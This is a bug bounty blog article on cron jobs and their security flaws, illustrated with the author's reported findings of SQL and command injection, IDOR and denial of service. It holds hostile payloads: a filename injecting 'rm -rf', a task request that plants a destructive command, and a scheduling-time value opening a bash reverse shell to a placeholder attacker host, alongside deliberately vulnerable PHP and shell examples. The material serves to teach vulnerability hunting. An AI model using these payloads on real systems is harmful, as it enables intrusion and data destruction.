Cronjobs for hackers (bugbounty article)

3 weeks ago 28
BOOK THIS SPACE FOR AD
ARTICLE AD

Fares Walid (SirBugs)

Hi folks 😀

I usually start most of my reports with “Hi folks 😀”, unless I’m actually upset with them. Bugbounty has its downsides too.

I am 21 YO, From Egypt. I’ve joined the cybersecurity PT in 11,2022.

I actually shifted from scripting and writing some codes and doing some automation scripts to this field, because i loved it.

I had too many friends into it too, it was interesting to me.

I started doing bugbounty at the beginning of 2023, then now I am working as a Security Consultant in the most strong cybersecurity company in egypt currently.

Part timing bugbounties, because the scams been a lot the previous months. Some good moments, and some bad moments, and it goes like that.

So, let’s keep on?

Not most of the programs appreciated these kind of bugs, Most of them said it’s normal .. It’s acceptable risk .. OOS .. blablabla :D

The Impact wasn’t enough for them, or they just didn’t want to pay xD

I started focusing on this area latley, in the previous 9/10 months, where i faced a talk about the cronjobs.

luckily after reading it, within some days, I faced a functionality while i was testing using cronjobs!

I said it’s my time I guess, It was a DoS and I could easily do it.

Then later, I started loving this criteria, and searched more about how they being handled?

Well studied? Then i came to this target and poisoned the data for other cronjobs.

After these cases in a month I could exploit a command injection via the cronjobs handlers 😀

But anyway, I still find vulns like this one while I am testing in some programs.

So let’s start the technical part now 😀

Cronjobs are automated commands or scripts executed at set intervals on Unix-based systems, used widely for maintenance, monitoring, extractions, withdrawals, importing and automation tasks.

Companies usually need to do some things manually, repeatably, daily, weekly, monthly, maybe yearly!

Maybe on a user request! when the user ask for something go get it for him, which will take sometime.

Imagine John opening everyday at 2AM to run a backup ..

He goes everyday in 2AM and run /usr/local/bin/backup.sh on the company’s server.

Is that imaginable at least? we need something to do it everyday?

Why don’t we just use a while loop that run command and sleep(24hrs) then repeat this command again and again and keeping it running in a process on the machine?

Loops continuously consume resources by keeping the script and its shell environment running in memory.

This can lead to unnecessary CPU and memory usage, particularly when tasks are scheduled far apart (e.g., every hour or day). In contrast, cron jobs only run when scheduled, freeing up system resources.

Loops relying on sleep intervals can encounter drift (small timing inaccuracies over time), leading to scheduled jobs running later than intended.

System sleep states, reboots, or network interruptions can disrupt loops, potentially halting the script. Instead, cronjobs managed by the cron daemon, handle such situations gracefully, ensuring jobs resume as expected after reboots or network issues.

The cron daemon runs as a system service, creating job logs by default in /var/log/cron or similar log files, making it easy to monitor and debug tasks. Loops, however, do not offer built-in logging, requiring additional code for monitoring, error handling, and recovery if the script fails or encounters errors.

Cronjobs enable running multiple tasks independently.

For loops, you’d need separate processes or careful handling to ensure tasks don’t interfere with one another, complicating the setup.

There are too many many cases for the cronjobs to be used in:

Daily Database Backup: 0 2 * * * /usr/local/bin/backup.shThis cron job runs a backup script at 2:00 AM every day, often used for database backups.Clearing Cache Weekly: 0 0 * * 0 rm -rf /var/www/html/cache/*Every Sunday at midnight, this job clears the cache folder for a web application, freeing up storage.Monitoring Disk Usage and Emailing Alerts: 0 * * * * /usr/local/bin/check_disk.sh | mail -s "Disk Usage Alert" [admin@example.com](<mailto:admin@example.com>)This cron job runs hourly, checking disk space. If usage exceeds a threshold, it sends an alert email.System Updates: 0 4 * * 1 apt-get update && apt-get upgrade -yEvery Monday at 4:00 AM, this job updates system packages, ensuring security patches are applied weekly.Restarting a Web Server Every Day: 0 5 * * * systemctl restart apache2This cron job restarts the Apache server every day at 5:00 AM, which can help prevent memory leaks or service issues.Sending Monthly Reports: 0 9 1 * * /usr/local/bin/generate_report.sh | mail -s "Monthly Report" [report@example.com](<mailto:report@example.com>)On the first day of every month at 9:00 AM, this job runs a script to generate and email a monthly report.Data Pulls, withdrawing money, processing images and others.

We will study in detail what this structure means later in other section.

Cronjobs operate based on the cron daemon, a background service that checks and executes tasks at specified intervals. Here’s a more technical breakdown of how it operates:

On startup, the cron daemon reads configuration files (usually /etc/crontab and user-specific crontab files located in /var/spool/cron/crontabs).It loads the scheduled jobs into memory and monitors these files for changes.On Unix-based systems, cron runs as a lightweight process, often with PID 1, to start automatically on boot.Each cronjob entry in a crontab file consists of five time-and-date fields, plus a command field.Cron interprets these fields based on the cron syntax, where each field specifies a particular time unit (minute, hour, day of the month, etc.).The daemon parses each entry, creating an internal scheduling queue that it checks every minute.Every minute, cron runs a check against the system clock.It compares the current time to the schedule in each cron entry to see if any jobs need execution.If there’s a match, it triggers the associated command.When a job is scheduled to run, cron forks a new process for the command, allowing the daemon itself to continue without interruption.This forked process is responsible for executing the specified command or script.Cron sets environment variables (like SHELL, HOME, PATH) in the job’s context before executing it, ensuring the job has the necessary environment to run.Cron jobs typically log outputs and errors to system logs, usually in /var/log/syslog or /var/log/cron. Which will need from you if you code some tools manually to handle. which means more code.If a job produces output, cron attempts to email it to the user specified in the job’s MAILTO variable (or the job owner if none is specified).If a job fails or encounters an error, it logs the error and exits, continuing with the next scheduled task.Cron can handle multiple jobs concurrently. Each job runs in isolation in its own forked shell process.Since each job is independent, multiple jobs scheduled at the same time can execute in parallel, with each job having its own environment variables and context.Cron jobs don’t persist in memory if a system reboots. After a restart, the cron daemon resumes and reloads the cron tables. which is the opposite if you coded, you will need to run it on each restart. Some systems support special strings like @reboot to specify jobs that should run once after every system boot, addressing cases where tasks must be triggered on startup.Whenever a user or administrator updates a crontab file using commands like crontab -e, the cron daemon detects changes and reloads the updated cron tables.This reload process is lightweight since the daemon only checks for timestamp changes on the files rather than rereading the entire file set constantly.

This process enables cron jobs to run reliably without consuming unnecessary resources, using a simple yet powerful model for scheduling and executing tasks.

cron-like functionality exists in various programming languages, either as modules or frameworks, allowing scheduled tasks without relying directly on the system’s cron service.

Pythonfrom apscheduler.schedulers.blocking import BlockingScheduler

def job():
print("Executing scheduled task")

scheduler = BlockingScheduler()
scheduler.add_job(job, 'cron', hour=3, minute=30) # Runs daily at 3:30 AM
scheduler.start()

Gopackage main

import (
"fmt"
"github.com/robfig/cron/v3"
)

func main() {
c := cron.New()
c.AddFunc("30 3 * * *", func() { fmt.Println("Running daily job at 3:30 AM") })
c.Start()

select {} // Prevent the program from exiting
}

PHP// In App\Console\Kernel.php
protected function schedule(Schedule $schedule)
{
$schedule->call(function () {
// Task code here
})->dailyAt('3:30');
}
Node.jsconst cron = require('node-cron');

cron.schedule('30 3 * * *', () => {
console.log('Running a job at 3:30 AM every day');
});

Rubyevery 1.day, at: '3:30 am' do
runner "MyModel.some_method"
end

A cron entry follows a specific format to define the timing, day, and frequency of execution. Each line in a crontab file represents one cron job and consists of five time-and-date fields, followed by the command to execute:

* * * * * command-to-run
│ │ │ │ │
│ │ │ │ └── Day of the week (0–7, where 0 and 7 are Sunday)
│ │ │ └──── Month (1–12)
│ │ └────── Day of the month (1–31)
│ └──────── Hour (0–23)
└────────── Minute (0–59)

Is there modules specified for handling cronjobs and running commands repeatably?

YES!

schedule: A lightweight library for simple job scheduling. Great for interval-based jobs.APScheduler (Advanced Python Scheduler): Offers flexibility for cron-like schedules, date-based tasks, and interval-based tasks, making it suitable for more complex scheduling needs.python-crontab: Provides access to system cron from within Python, allowing you to create, update, and delete cron jobs in the system crontab file.node-cron: A popular cron library that supports standard cron expressions to run scheduled tasks.agenda: A job scheduling library based on MongoDB, suitable for complex task handling and supports retries, concurrency, and priorities.bree: A straightforward library for job scheduling in Node.js, optimized for both short and long-running jobs.whenever: A Ruby gem that generates cron jobs using a Ruby DSL, making it easy to integrate into Rails applications.rufus-scheduler: Provides in-process job scheduling that doesn’t rely on the system cron. It supports cron syntax, intervals, and time-based scheduling.Laravel Scheduler: Part of the Laravel framework, allowing users to define scheduled tasks within the application code instead of directly managing cron jobs.crontab-manager: A PHP package that provides simple management for cron jobs via PHP.Quartz Scheduler: A powerful scheduling library supporting complex job scheduling for Java applications. It can handle jobs based on calendar intervals, cron expressions, and even dependencies.Spring Task Scheduler: Integrated within the Spring framework, allowing cron-style scheduling and interval-based tasks using Spring’s @Scheduled annotation.robfig/cron: A cron library for Go that supports cron syntax and custom scheduling intervals. It’s widely used in production environments for background job scheduling.go-cron: Provides cron-based scheduling with a simple API, suitable for Go applications that require periodic background tasks.

A cronjob in an application I did bugbounty for was taking a cronjob Id.

How will the system know that this exporting process for example is related to a specific user? normally. they will make something like array in the DB for this user contains his processes Ids.

After finishing the process, the results being sent on mail.

The request was in JSON, taking the following post data:

{
"Proccess": ["123456"]
}

where 123456 where the Process UUID releated to this user only. If we tried to add more than Id/UUID in this [] like:

{
"Proccess": ["123456", "456789"]
} // we need to use the loop then! not only one direct query ..

we would get an error, this proccess is not related to you :D

But what about getting it for more users not related to me? with:

{
"Proccess": ["123456 , 456789"]
}

YES it worked, do you know why?

-- Vulnerable query example
SELECT * FROM export_data WHERE process_id IN ({process_ids});

user_input = "123, 456, 789" # User-controlled input, bypassed with malicious array
query = f"SELECT * FROM export_data WHERE process_id IN ({user_input});"

This will take the user input, the only one input in [] and runs it directly. Which makes it vulnerable without sanitizing this input!

Another Scenario!

A web application lets users upload files, and the filenames are stored in a database. Every minute, a cron job runs to process these files and log their contents for later retrieval. Unfortunately, the cronjob script constructs a shell command using unsanitized filenames, leading to command injection.

You know the reason? It’s simple I know it! I imagined that the code is something like:

<?php
if ($_FILES['file']['error'] == UPLOAD_ERR_OK) {
$filename = basename($_FILES['file']['name']);
$target_path = "/uploads/" . $filename;

move_uploaded_file($_FILES['file']['tmp_name'], $target_path);

$conn->query("INSERT INTO uploaded_files (filename) VALUES ('$filename')");
echo "File uploaded successfully!";
} else {
echo "File upload failed.";
}
?>

Cronjob Shell Script:

#!/bin/bash
# process_files.sh
files=$(mysql -u username -p'password' -D database -e "SELECT filename FROM uploaded_files")

for file in $files; do
cat "/uploads/$file" >> /var/log/file_contents.log
done

How Did I Exploit into this?

The cron job does not sanitize the $file variable before passing it to cat. This allows an attacker to inject shell commands through the filename.

The attacker uploads a file with a crafted filename: innocent.txt; rm -rf /important_data; echo

This filename contains a rm -rf command injection that, when executed, will delete files.

Trigger the Vulnerable Cron Job:

cat "/uploads/innocent.txt; rm -rf /important_data; echo" >> /var/log/file_contents.logThe filename innocent.txt; rm -rf /important_data; echo is saved to the databaseThe cron job retrieves the filename and constructs the command:cat "/uploads/innocent.txt; rm -rf /important_data; echo" >> /var/log/file_contents.logWhen the cron job runs, rm -rf /important_data is executed, deleting important data.

This let me to exploit a command injection successfully 😀

It maybe different, but this was what i imagined!

An IDOR was detected again later, Allows me to poison and modify / add cronjobs of and to other users!

A web application allows users to set up periodic tasks, such as automated data exports or file processing. The tasks are stored in a database and later processed by a server-side cron job that reads from this database. Due to an IDOR vulnerability, the attacker can modify or add tasks to other users’ accounts, which are then executed by the cronjob with the permissions of the victim’s account.

imagine the following code:

tasks=$(mysql -u username -p'password' -D database -e "SELECT command FROM user_tasks WHERE user_id = $USER_ID")

for task in $tasks; do
# Execute each task
eval "$task"
done

Web Application’s Task Scheduling Feature: Users can create periodic tasks in the application, which are stored in the user_tasks table with a structure like:

user_tasks (
id INT PRIMARY KEY,
user_id INT,
command TEXT,
schedule VARCHAR(255)
)

The user can define the command that gets executed at the specified schedule, which the cron job later pulls and executes.

The application’s endpoint for scheduling tasks does not properly validate the user_id associated with the task, allowing users to modify the user_id to affect other users’ tasks:

For example, the API endpoint to add a task might look like this:

POST /api/v1/schedule_task

{
"user_id": 1001, # Target user ID, changed to point to another user
"command": "rm -rf /important_data", # Malicious command to delete files
"schedule": "*/5 * * * *"
}

We will comeback a little bit later for the schedule parameter too xD

Imagine even the IDOR was in exporting the cronjobs results?

POST /api/v1/export_output

{
"process": 23468234555
}

if this process parameter, was vulnerable to IDOR!

Due to not checking if this result related to this user or not! We can replace this id with any other Id, and we will fetch their data easily!

That’s why the processes_ids is important array for each user to keep his processes only!

Using cronjobs to perform Denial of Service (DoS) attacks involves manipulating cronjobs to repeatedly execute resource-intensive tasks at high frequencies, overwhelming system resources such as CPU, memory, or disk space. This can lead to a slowdown or crash of the system, effectively rendering services unusable.

High-Frequency Scheduling: Setting a cron job to run every second or minute with a resource-heavy task can exhaust system resources quickly.Looping Resource-Intensive Commands: Commands that perform large read/write operations, compute-intensive tasks, or execute recursive file deletions can be devastating when scheduled in quick succession.Uncontrolled Log Growth: Misconfiguring cron jobs to produce excessive log output can rapidly fill up storage, causing the system to crash due to insufficient disk space.

and there are too many other scenarios.

A Scenario!

One of the most common application to reschedule meeting and time lines i’ve been testing on in hackerone. Was doing some a great work with my collaborator Ayman hackerone@0xa1mn

The administrator can book some actions being done to the user when he applies for our form/application.

like selecting: send him welcome message after 1 minute, send him ad after 6hrs, send him a message for confirmation after 12hrs, and other and other actions within a specific time frames.

But It was limited in the UI to 5 actions only, So do you think about what am I thinking?

In the request, I added more and more and more actions, which within 3 or 4 workflows caused a full DoS for the whole organization.

The team awarded me 150$ and it’s low because DoS was OOS. But if it wasn’t, it would be a great one tbh 😀

Another one, But this wasn’t accepted at first because DoS is OOS too. IDK why it’s OOS tbh, come on it’s a good bug .. But anyway, they awarded me with 100$ with Ayman too 😀

The bug here was in the exporting function! I do export data for all of my users (that i don’t see them currently in UI because they are very old) all of them, or in a specific timeframe or something .. This may take some time from the application, so they used cronjobs.

But, there’s nothing good forever xD

They limited the requests for pulling data to 1 request per 30 minutes.

But since this was vulnerable to Race Condition, We could do for one account maybe 100 request per 30 minutes 😀

Which within 10 15 more exploitation for different accounts dropped down the whole functionality for the application. It’s full now.

More than element to handle!

This bug was in a public bb program, but i guess I can’t disclose its name too.

The request was taking some of my files and pass them to internal analysis by an OCR module as the documentations said. This was happening with cronjobs too.

They passed my file, limited to 12 files only per time like:

POST /api/v1/review

{
"file": [
"0274a497-ff98-4f4f-b084-2bbb5062e841",
"6fcd44f4-87ad-48c7-8857-a8e44daf20f2",
"599e66e0-4364-4a04-ae6f-e6a78933b8fd",,,,,,,
]
}

But this limit was only over UI, I passed more than 12 files, even the same file id more than a time..

Which in a few moments flooded the function over the whole organization by a low role account!

Cron job module exploitation involves leveraging vulnerabilities within libraries, modules, or packages designed to manage scheduled tasks, especially in application-level cron job frameworks across different programming languages. Attackers can exploit these vulnerabilities to gain unauthorized access, execute arbitrary commands, or manipulate job scheduling.

Command Injection in Job Definitions: Many cron job modules allow job definitions that include shell commands. If these commands are constructed insecurely, an attacker can inject malicious code.Access Control Bypass: Some modules may lack strict access control, allowing users to view, modify, or delete cron jobs outside of their privileges.Deserialization Vulnerabilities: Certain cron modules store job definitions as serialized objects, which, if not properly validated, can be exploited to execute arbitrary code.Improper Input Sanitization: Cron modules that allow custom parameters in jobs may not properly sanitize inputs, opening the door for code or SQL injection.Path Manipulation: Modules that rely on file paths or environment variables for execution can be exploited if the attacker can control these variables or paths.

These modules like has its own CVEs too! Modules being vulnerable, So don’t always forget to try to detect which technologies or modules being used to be more helpful!

You can depend on:

Banner Grabbing and FingerprintingEndpoint Discovery and Analysis: Some libraries or frameworks expose specific endpoints (e.g., /scheduler for task scheduling APIs in Python or /jobs for Laravel Scheduler). Attackers can look for these endpoints by enumerating known paths or using tools like ffufOpen Ports and Service Detection: Certain modules may open specific ports or services that can be detected by port scanning tools like Nmap. For example, Celery often uses message brokers like RabbitMQ on ports 5672 (AMQP) or 6379 (Redis).JavaScript and CSS Files: Some modules load JavaScript or CSS files on the client side, which can include identifying paths or version information. Tools like Wappalyzer can detect JavaScript libraries and frameworks.Configuration Files and Public Repositories: Configuration files (e.g., .env, appsettings.json for .NET, config/schedule.rb for Ruby) can leak information about the libraries in use. If these files are publicly accessible or mistakenly committed to public repositories (like GitHub), they can reveal specific modules.

Scheduled Task Exhausting is a type of denial-of-service (DoS) attack where an attacker overloads the system by scheduling an excessive number of resource-intensive tasks or configuring tasks to run at very high frequencies. This can exhaust system resources, including CPU, memory, and disk space, leading to system slowdown, unresponsiveness, or crashes.

As someone who focus on the business logic errors in lows & mediums and love how to think and making the functions toxic to themselves, I see this idea maybe vulnerable to too many bugs! Leading to resources exhausting and high bills later.

This was a previous found bug too, The application had a scheduling portal, a table to manage it the schedules.

So it allowed to re-schedule some workflows in a specific time-range, like doing schedules for this month only.

But how about bypassing this month? doing something for the next month? NOW THE PAGE IS OVERLOADING AND NOT SHOWING ANYTHING!

This was closed as informative IDK why since it could be done from anyone in the team not only the admin, but it’s OK. welcome to bugbounty wrld.

Can this cause a resources exhausting to schedule in the away future?

If you read the beginning of the article, you would find that we showed how this being working!

We said they are something like queries in a files for example and we checking all of their time, dates, if they are now, execute, if not .. pass.

So how about Scheduling 1000000 task in 2030 ?? Imaging checking for all of those before all the tasks? how would the delay they cause look like? and other problems.

So this if it’s not handled can cause an overload for nothing!

Which could exhaust the server resources and sometimes DoS too.

So Always, If you are a developer handle this well, make it making sense, not accepting any values into it.

Converting Scheduled Time to the query!

Always, Always, Always, Always, and mostly you will find a thing like: schedule_time in your request parameters or a param like it responsible for the time of the task to be run at. On handing these tasks, users have to provide a time frame! a date to be run on! or even a time to be repeated on repeat after this time, like after 10hrs!

A web application allows users to schedule tasks at a specific date and time in the format YYYY-MM-DD HH:MM. The application backend parses this date and time and converts it to cron syntax for execution. However, due to improper sanitization of the scheduling_time input, an attacker can inject commands by manipulating the date and time value.

Users can submit a request to schedule a task by specifying a scheduling_time in a real date and time format. the request was something like:

POST /api/schedule_task
Content-Type: application/json

{
"task": "backup_data",
"scheduling_time": "2024-11-05 10:30"
}

Vulnerable Backend Code Imagination

$task = $_POST['task'];
$scheduling_time = $_POST['scheduling_time']; // Vulnerable to injection

$cron_time = date("i H d m", strtotime($scheduling_time)) . " *";
$command = "echo '$cron_time php /path/to/tasks/$task.php' | crontab -";
shell_exec($command);

Explanation

$scheduling_time is directly passed to strtotime and then converted into a cron time format without validation.If scheduling_time contains extra shell commands, they’ll be passed along, resulting in command injection.

Crafting the malicious POST data

{
"task": "backup_data",
"scheduling_time": "2024-11-05 10:30; /bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1 #"
}

Explanation

The ; allows the attacker to end the cron time syntax and start a new command./bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1 opens a reverse shell to the attacker.The # at the end comments out any remaining cron job syntax to avoid syntax errors.

Injected Command in the Cron Job

echo '30 10 05 11 *; /bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1 # php /path/to/tasks/backup_data.php' | crontab -

In the end, I hope you had fun!

Written with all love in over 2 weeks and collecting bugs from previous year :D

My accounts:

twitter@SirBagoza

medium@bag0zathev2

youtube@cyberbugz

Thank you for your time ..

Best Regards.

Read Entire Article